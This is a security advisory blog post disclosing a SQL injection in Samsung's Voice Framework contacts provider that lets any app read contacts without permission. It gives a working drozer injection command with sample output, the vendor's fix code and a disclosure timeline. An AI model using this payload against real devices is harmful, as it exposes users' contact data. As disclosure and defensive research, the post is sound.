Blog

SQL Injection in Samsung Voice Framework Application

27/11/2015 | Author: Admin

SQL Injection in Samsung Voice Framework Application

Vulnerability Description

The Samsung Voice application provides a means to control your smartphone through voice commands, such as initiating calls to the device’s contacts. It is installed by default on Samsung smartphones, including the Galaxy S6. The application is relatively privileged, holding permissions such as android.permission.READ_CONTACTS, allowing it to read the user’s contact data.

Versions before 1.1.2009 of the SVF application have no permissions applied to the com.samsung.android.svf.contacts.contentprovider content provider, meaning it can be trivially interacted with by other applications on the device. The content provider provides a means to query the device’s contacts database. MDSec identified a SQL injection vulnerability in the projection of the SQL query used that allows any application on the device to circumvent the Android permission model and retrieve all the device’s contacts, without the android.permission.READ_CONTACTS permission.

An example of how this issue can be exploited using the drozer attack framework is shown below:

dz> run app.provider.query content://com.samsung.android.svf.contacts.contentprovider --projection "* from data limit 2--"
| _id | raw_contact_id | contact_id | version | mimetype | data1 | data2 | data3 | data4 | data5 | data6 | data7 | data8 | data9 | times_contacted | starred | display_name | phonetic_name | lookup | in_visible_group | original_id |
| 1 | 9 | 12 | 3 | vnd.android.cursor.item/photo | null | null | null | null | null | null | null | null | null | 0 | 0 | abc@abc.com | null | 814i1e | 0 | null |
| 2 | 19 | 4 | 3 | vnd.android.cursor.item/nickname | null | null | null | null | null | null | null | null | null | 0 | 0 | foo@bar.com | null | 814i1e92d164892150d7 | 0 | null |
dz>

Fix Information

This issue is resolved in version 1.1.2009 of the SVF application. The issue was resolved by applying the following permissions to the content provider:


Package: com.samsung.android.svf
Authority: com.samsung.android.svf.contacts.contentprovider
Read Permission: com.sec.voice.permission.RECEIVE
Write Permission: com.sec.voice.permission.RECEIVE

In addition to the above, Samsung attempted to resolve the issue by blacklisting certain characters from the passed parameters, as shown below:


public Cursor query(Uri arg0, String[] arg1, String arg2, String[] arg3, String arg4) {
    Log.i(TAG, "query Uri:=" + arg0 + " 1:=" + arg1 + " 2:=" + arg2 + " 3:=" + arg3 + " 4:=" + arg4);
    Cursor ret = super.query(arg0, arg1, arg2, arg3, arg4);
    for (String query : arg1) {
      if (query.contains("*") || query.contains(IBase.SEMICOLON) || query.contains("'") || query.contains("\"")) {
        return null;
      }
    }
    Log.i(TAG, "query result:=" + ret + " size(" + ret.getCount() + IBase.CLOSING_BRACKET);
    return ret;
}

It’s worth noting that this blacklisting approach would not be sufficient to resolve the issue on its own.

Vulnerability Timeline

13/05/2015:Vulnerability reported to Samsung
15/05/2015:Response from Samsung indicating they will review the issue
15/05/2015:MDSec provide ROM and package versions to Samsung
18/06/2015:Samsung provide update indicating a fix will take time due to negotiations with carriers
24/07/2015:Samsung provide further update indicating they are negotiating a release schedule with the carriers
17/09/2015:MDSec requests an update on the issue
23/09/2015:Samsung indicate they are negotiating an OTA update with the carriers
04/11/2015:Update to package received. MDSec ask Samsung if the issue has been resolved
09/11/2015:Samsung indicate they believe the issue is patched

This issue was disclosed by Dominic Chell.

If you’re interested in learning more about the exploitation of mobile devices, get in touch to find out more about our Mobile Application Hacker’s Handbook training or Mobile Security services.

Ready to start testing your applications?

Speak to one of our industry experts and find out how MDSec can help your business.

+44 (0) 1625 263 503

contact@mdsec.co.uk